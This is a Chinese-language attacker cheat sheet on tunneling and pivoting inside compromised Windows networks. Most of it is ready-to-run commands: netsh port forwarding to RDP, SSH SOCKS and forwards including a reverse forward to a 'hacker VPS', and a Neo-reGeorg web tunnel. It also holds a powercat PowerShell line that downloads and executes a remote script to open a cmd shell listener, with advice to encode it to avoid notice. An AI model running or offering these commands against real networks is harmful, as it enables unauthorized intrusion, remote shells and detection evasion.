Windows内网渗透_2.传输通道
2.1、判断出网
ping | icmp |
---|---|
curl | http |
nslookup | dns |
2.2、netsh端口转发
A机器执行如下命令:
netsh interface portproxy add v4tov4 listenport=5555 connectport=3389 connectaddress=192.168.1.1 protocol=tcp
B机器访问A机器的5555端口,即是192.168.1.1的3389端口
2.3、ssh
ssh一般被拿来登录linux机器,也可以拿来做代理和转发。
a、开启socks代理:
ssh -qTfnN -D 1111 root@1.1.1.1
输入1.1.1.1机器密码,本地利用proxychains等类似工具连接本地的1111端口的sock5连接即可代理1.1.1.1的网络。
b、控制A、B机器,A能够访问B,且能出网,B能够访问C,但不能出网,A不能访问C:
A机器执行:
ssh -CNfg -L 2121:CIP:21 root@BIP
输入BIP机器密码,访问A的2121端口即是访问CIP的21端口。
c、控制A机器,A能够访问B:
A机器执行:
ssh -CNfg -R 2121:BIP:21 root@hackervps
输入黑客vps密码,访问黑客vps的2121端口即是访问BIP的21端口。
2.4、Neo-reGeorg
https://github.com/L-codes/Neo-reGeorg
python neoreg.py generate -k password
python3 neoreg.py -k password -u http://xx/tunnel.php
2.5、powercat
powercat是一款ps版nc。可以本地执行,也可以远程下载执行,远程执行命令如下:
powershell”IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1’);powercat-l -p 8000 -e cmd”
然后远程连接执行命令即可。如果嫌弃该命令太暴露,可以对其进行编码。
2.6、mssql
当目标机器只开放mssql时,我们也可以利用mssql执行clr作为传输通道。
环境如下:
工具项目地址:
https://github.com/blackarrowsec/mssqlproxy
2.7、pystinger
https://github.com/FunnyWolf/pystinger